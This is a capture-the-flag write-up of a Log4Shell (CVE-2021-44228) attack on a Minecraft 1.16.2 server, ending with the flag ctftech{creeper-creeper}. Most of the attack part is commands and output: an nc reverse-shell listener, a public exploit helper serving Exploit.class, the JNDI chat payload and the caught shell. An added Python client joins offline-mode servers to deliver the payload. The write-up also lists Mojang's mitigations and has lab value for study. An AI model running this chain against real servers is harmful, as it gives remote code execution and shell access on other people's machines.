You have been hosting a Minecraft server for your friends for a long time.
All has been running smoothly and you have learned a lot in the process. Friends are happy as well :)
One day suddenly you read news about all kinds of vulnerabilities and how everything is insecure.
You start to wonder if your server is also affected.
Find the vulnerability in your system.
When you have found it, get the flag from /flag.
Minecraft server:
Hostname: envXXX.target02
Port: 25565
Server is running in offline mode.
Scanning port 25565 with nmap reveals it is indeed running a Minecraft server.
# nmap -sV -p 25565 envXXX.target02
Nmap scan report for envXXX.target02 (10.92.XX.Y)
Host is up (0.0026s latency).
PORT STATE SERVICE VERSION
25565/tcp open minecraft Minecraft 1.16.2 (Protocol: 127, Message: Welcome to 2cCTF Techr Minecraft server. Stay safe!, Users: 0/20)
Minecraft 1.16.2 bundles a vulnerable Log4j 2 and is affected by Log4Shell (CVE-2021-44228): the server logs every chat message through Log4j, so a ${jndi:ldap://...} lookup embedded in a chat line is resolved by the server itself, loading attacker-supplied Java code. Since the server runs in offline mode, anyone can join and chat without a Mojang/Microsoft account, which makes the bug exploitable without any credentials. Exploitation is straightforward. (For reference, Mojang's mitigation for 1.12 to 1.16.5 servers is to start the server with -Dlog4j.configurationFile=log4j2_112-116.xml; 1.17 and 1.18 take -Dlog4j2.formatMsgNoLookups=true, and 1.18.1 ships with a fixed Log4j.)
Start reverse-shell listener.
# nc -lvnp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Download a public Log4j exploit helper, to start LDAP and web server, which will deploy the exploit.
# git clone --depth=1 https://github.com/cybersecurityworks553/log4j-shell-csw
Cloning into 'log4j-shell-csw'...
remote: Enumerating objects: 11, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 11 (delta 0), reused 2 (delta 0), pack-reused 0
Receiving objects: 100% (11/11), 36.87 MiB | 5.62 MiB/s, done.
# cd log4j-shell-csw
# python3 CVE-2021-44228-exploit.py --userip 10.85.XX.Y --webport 8888
[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://10.85.XX.Y:1389/a}
[+] Starting Webserver on port 8888 http://0.0.0.0:8888
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.85.XX.Y:8888/Exploit.class
To trigger the exploit a Minecraft client is needed, because the payload has to arrive as an ordinary chat message that the server then logs. Minecraft Console Client (MCC) is a good choice; with "-" as the password it joins in offline mode under any username.
Connect to the target and send the JNDI string as chat.
# ./MinecraftClient "pwn" "-" envXXX.target02
Minecraft Console Client v1.19.2 - for MC 1.4.6 to 1.19.2 - Github.com/MCCTeam
Resolving envXXX.target02...
You chose to run in offline mode.
Retrieving Server Info...
Server version : 1.16.2 (protocol v751)
[MCC] Version is supported.
Logging in...
[MCC] Server is in offline mode.
[MCC] Server was successfully joined.
Type '/quit' to leave the server.
> ${jndi:ldap://10.85.XX.Y:1389/a}
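What MCC does in the session above, reduced to the wire protocol, as an added example (my own code, not part of the original write-up, of MCC or of the exploit helper): a minimal offline-mode client for protocol 751 (Minecraft 1.16.2) that sends Handshake and Login Start, handles the server's Set Compression and Login Success packets, waits for Join Game and then sends one chat packet. Packet IDs are the protocol 751 values; host, port, username and message are command-line placeholders, and the JNDI string used in the test is the one the helper printed. The client does not answer Keep Alive, so it only stays connected long enough to deliver the message.

```python
import socket
import struct
import zlib

# Packet IDs for protocol 751 (Minecraft 1.16.2).
HANDSHAKE, LOGIN_START = 0x00, 0x00        # serverbound
LOGIN_DISCONNECT, LOGIN_SUCCESS, SET_COMPRESSION = 0x00, 0x02, 0x03  # clientbound, login state
JOIN_GAME = 0x24                           # clientbound, play state
CHAT_MESSAGE = 0x03                        # serverbound, play state
PROTOCOL_751 = 751


def write_varint(value: int) -> bytes:
    """Minecraft VarInt: 7 data bits per byte, low group first, MSB set = more bytes follow."""
    value &= 0xFFFFFFFF
    out = bytearray()
    while True:
        byte, value = value & 0x7F, value >> 7
        out.append(byte | 0x80 if value else byte)
        if not value:
            return bytes(out)


def varint_from(buf: bytes):
    """Decode a VarInt at the start of buf; return (value, bytes consumed)."""
    value, shift = 0, 0
    for n, byte in enumerate(buf, 1):
        value |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            return value, n
        if shift > 35:
            raise ValueError("VarInt too long")
    raise ValueError("truncated VarInt")


def write_string(text: str) -> bytes:
    data = text.encode("utf-8")
    return write_varint(len(data)) + data


def frame(packet_id: int, payload: bytes, threshold: int = -1) -> bytes:
    """Length-prefix a packet. threshold < 0: plain framing. Otherwise the framing used
    after Set Compression: outer length, then data length (0 = stored uncompressed)."""
    body = write_varint(packet_id) + payload
    if threshold < 0:
        return write_varint(len(body)) + body
    if len(body) < threshold:
        inner = write_varint(0) + body
    else:
        inner = write_varint(len(body)) + zlib.compress(body)
    return write_varint(len(inner)) + inner


def handshake(host: str, port: int, next_state: int = 2) -> bytes:
    return frame(HANDSHAKE, write_varint(PROTOCOL_751) + write_string(host)
                 + struct.pack(">H", port) + write_varint(next_state))


def login_start(username: str) -> bytes:
    return frame(LOGIN_START, write_string(username))


def chat_message(text: str, threshold: int) -> bytes:
    return frame(CHAT_MESSAGE, write_string(text), threshold)


def bytes_reader(data: bytes):
    """read(n) callable over a byte buffer, e.g. a captured stream; same shape as recv_exactly."""
    buf = bytearray(data)
    def read(n: int) -> bytes:
        if len(buf) < n:
            raise EOFError("short read")
        chunk = bytes(buf[:n])
        del buf[:n]
        return chunk
    return read


def recv_exactly(sock: socket.socket, n: int) -> bytes:
    data = b""
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise EOFError("connection closed")
        data += chunk
    return data


def read_varint(read) -> int:
    raw = b""
    while True:
        raw += read(1)
        if not raw[-1] & 0x80 or len(raw) == 5:
            return varint_from(raw)[0]


def read_packet(read, threshold: int):
    """Return (packet_id, payload) of the next packet, undoing compression framing if active."""
    body = read(read_varint(read))
    if threshold >= 0:
        data_len, n = varint_from(body)
        body = zlib.decompress(body[n:]) if data_len else body[n:]
    packet_id, n = varint_from(body)
    return packet_id, body[n:]


def join_and_chat(host: str, port: int, username: str, message: str, timeout: float = 10.0) -> int:
    """Join an offline-mode server, send one chat line, return the negotiated compression threshold."""
    threshold = -1
    with socket.create_connection((host, port), timeout=timeout) as sock:
        read = lambda n: recv_exactly(sock, n)
        sock.sendall(handshake(host, port) + login_start(username))
        while True:                                   # login state; offline mode sends no Encryption Request
            pid, payload = read_packet(read, threshold)
            if pid == SET_COMPRESSION:
                threshold = varint_from(payload)[0]   # every later packet uses compressed framing
            elif pid == LOGIN_SUCCESS:
                break
            elif pid == LOGIN_DISCONNECT:
                raise RuntimeError("kicked: " + payload[varint_from(payload)[1]:].decode("utf-8", "replace"))
        while read_packet(read, threshold)[0] != JOIN_GAME:   # play state: wait until the player is placed
            pass
        sock.sendall(chat_message(message, threshold))
        read_packet(read, threshold)                  # give the server a chance to consume the chat first
    return threshold


if __name__ == "__main__":
    import sys
    host, port, user, msg = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]
    print("compression threshold:", join_and_chat(host, port, user, msg))
```

Run as python3 mc_chat.py envXXX.target02 25565 pwn '${jndi:ldap://10.85.XX.Y:1389/a}' (file name assumed). Vanilla servers default to network-compression-threshold=256, so the Set Compression branch is exercised on a real target even though the short JNDI line itself travels uncompressed. The bytes_reader helper lets the same read_packet walk a byte buffer captured from a client, which is handy for confirming what exactly was sent.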
The exploit helper receives the LDAP lookup from the server and serves Exploit.class over HTTP:
10.92.XX.Y - - [0X/Oct/2022 AA:BB:CC] "GET /Exploit.class HTTP/1.1" 200 -
Reverse shell received. It runs as the unprivileged minecraft user, but /flag/ender-dragon.txt is world-readable, so no privilege escalation is needed to retrieve the flag.
Ncat: Connection from 10.92.XX.Y.
Ncat: Connection from 10.92.XX.Y:39002.
id
uid=1000(minecraft) gid=1000(minecraft) groups=1000(minecraft)
cd /flag
ls -al
total 12
drwxr-xr-x 2 root root 4096 Oct 3 15:49 .
drwxr-xr-x 1 root root 4096 Sep 21 10:17 ..
-rw-r--r-- 1 root root 25 Oct 3 15:49 ender-dragon.txt
cat ender-dragon.txt
ctftech{creeper-creeper}
Flag is ctftech{creeper-creeper}